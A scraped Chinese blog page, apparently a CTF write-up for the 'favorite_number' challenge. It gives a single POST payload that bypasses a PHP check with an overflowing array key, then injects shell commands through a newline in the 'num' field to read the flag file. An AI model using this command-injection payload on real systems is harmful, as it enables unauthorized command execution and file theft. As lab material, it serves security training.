当前位置:网站首页>攻防世界-favorite_number
攻防世界-favorite_number
2022-08-02 17:13:00 【NCNIPC梅苑】
favorite_number
首先泄露了php的版本
同其他师傅的payload不同的是
我的post数据中多了个分号;
最后是通过写文件打印文件的形式拿到的flag
stuff[4294967296]=admin&stuff[1]=user&num=123%0Aprintf /fla > /tmp/hello %26%26 printf g >> /tmp/hello %26%26 tac `tac /tmp/hello`;
边栏推荐
- Nacos环境隔离
- Mysql应用安装后找不到my.ini文件
- golang源码分析(9)调度
- 蔚来杯2022牛客暑期多校训练营5 ABCDFGHK
- NIO Cup 2022 Niu Ke Summer Multi-School Training Camp 5 ABCDFGHK
- golang源码分析(6):sync.Mutex sync.RWMutex
- 什么是APS系统?导入APS要注意什么?值得反复观看
- nacos简单使用
- Wechat Gymnasium Appointment Mini Program Graduation Design Finished Works Mini Program Graduation Design Finished Work (6) Question Opening Reply PPT
- nacos集群配置详解
猜你喜欢
随机推荐
Kubernetes:(七)优化大法(江湖失传已久的武林秘籍)
Wechat Gymnasium Appointment Mini Program Graduation Design Finished Works Mini Program Graduation Design Finished Work (6) Question Opening Reply PPT
Navicat for mysql cracked versions installed
npm install 时,卡住不动,五种解决方法
Kubernetes:(五)Pod进阶(资源限制、健康检查)
Smart Contract Security - delegatecall (1)
融云「 IM 进阶实战高手课」系列直播上线
MYSQL下载及安装完整教程
npm install报gyp info it worked if it ends with ok
【C语言刷题】指针入门三题|字符串长度、字符串复制、两数交换
如何生成随机数+原理详细分析
持续集成(四)Jenkins配置报警机制
安全至上:落地DevSecOps最佳实践你不得不知道的工具
NAACL 2022 | 具有元重加权的鲁棒自增强命名实体识别技术
golang源码分析(6):sync.Mutex sync.RWMutex
SQL Statement Basics
【无标题】
Navicat premium download and install 15 detailed tutorial
nacos集群配置详解
嵌入式Qt-做一个秒表